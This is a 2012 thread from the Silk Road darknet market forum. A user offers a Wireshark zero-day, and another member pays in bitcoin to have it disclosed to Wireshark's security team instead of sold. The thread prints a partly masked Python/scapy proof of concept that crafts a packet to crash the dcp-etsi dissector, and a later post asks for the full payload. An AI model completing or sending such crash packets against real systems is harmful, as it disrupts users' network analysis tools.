Silk Road forums
Market => Product offers => Topic started by: markjenkins on August 04, 2012, 02:58 am
-
I have a 0day for wireshark. Would their be any interest for it here?
-
No, probably not. Anything meant to harm or defraud others is against the rules.
Would you be willing to submit it to the wireshark devs if I chipped 0.10 btc at you?
-
Yes I would.
-
The full code as been sent to security@wireshark.org
Bitcoin 15oaSCmzQ2jDXsNG5KKeeLyJzFcbsuatnq
#!/usr/bin/python
#divide
by zero in dcp-etsi.c wireshark dissector
from
scapy.all import *
from
sys import *
crashdata='504623c40000000088############'.decode('hex')
if
len(argv)<2:
packet=Ether()/IPv6(dst="::1")/UDP(dport=55935,sport=42404)/crashdata
wrpcap('lol.pcap',[packet])
print
"open lol.pcap"
else:
packet=IPv6####################
send(packet)
-
The full code as been sent to security@wireshark.org
Bitcoin 15oaSCmzQ2jDXsNG5KKeeLyJzFcbsuatnq
#!/usr/bin/python
#divide
by zero in dcp-etsi.c wireshark dissector
from
scapy.all import *
from
sys import *
crashdata='504623c40000000088############'.decode('hex')
if
len(argv)<2:
packet=Ether()/IPv6(dst="::1")/UDP(dport=55935,sport=42404)/crashdata
wrpcap('lol.pcap',[packet])
print
"open lol.pcap"
else:
packet=IPv6####################
send(packet)
I'm assuming that is just a part of the full code, yes? Either way... your coins are on their way.
Because I'm sure it's foolish... but I'm choosing to trust you.
-
You'll need the scapy python library for that script to work.
Found the original article here: http://isisblogs.poly.edu/2012/08/03/tracing-bugs-in-wireshark/
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
I paid to have it sent to the provider. :)
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
I paid to have it sent to the provider. :)
Good show white hat! +1 for you :)
-
Why would you pay for a zero-day when the exploit has already been sent to the provider?
I paid to have it sent to the provider. :)
+1, good on you mate.
-
+1 to BR and to OP too. Well i'm almost to 100 posts.
-
Ahh...I swear we have the most unexpected things happening on SR. ;)
-
Oh c'mon! just reveal the entire payload! :D
By the way, how did you find it? I've always wanted to know how people discover it.
I have a bit of experience creating cracks and keygens but I never understood how people find ways to overflow the buffer and write to the executable space.
Can you enlighten me?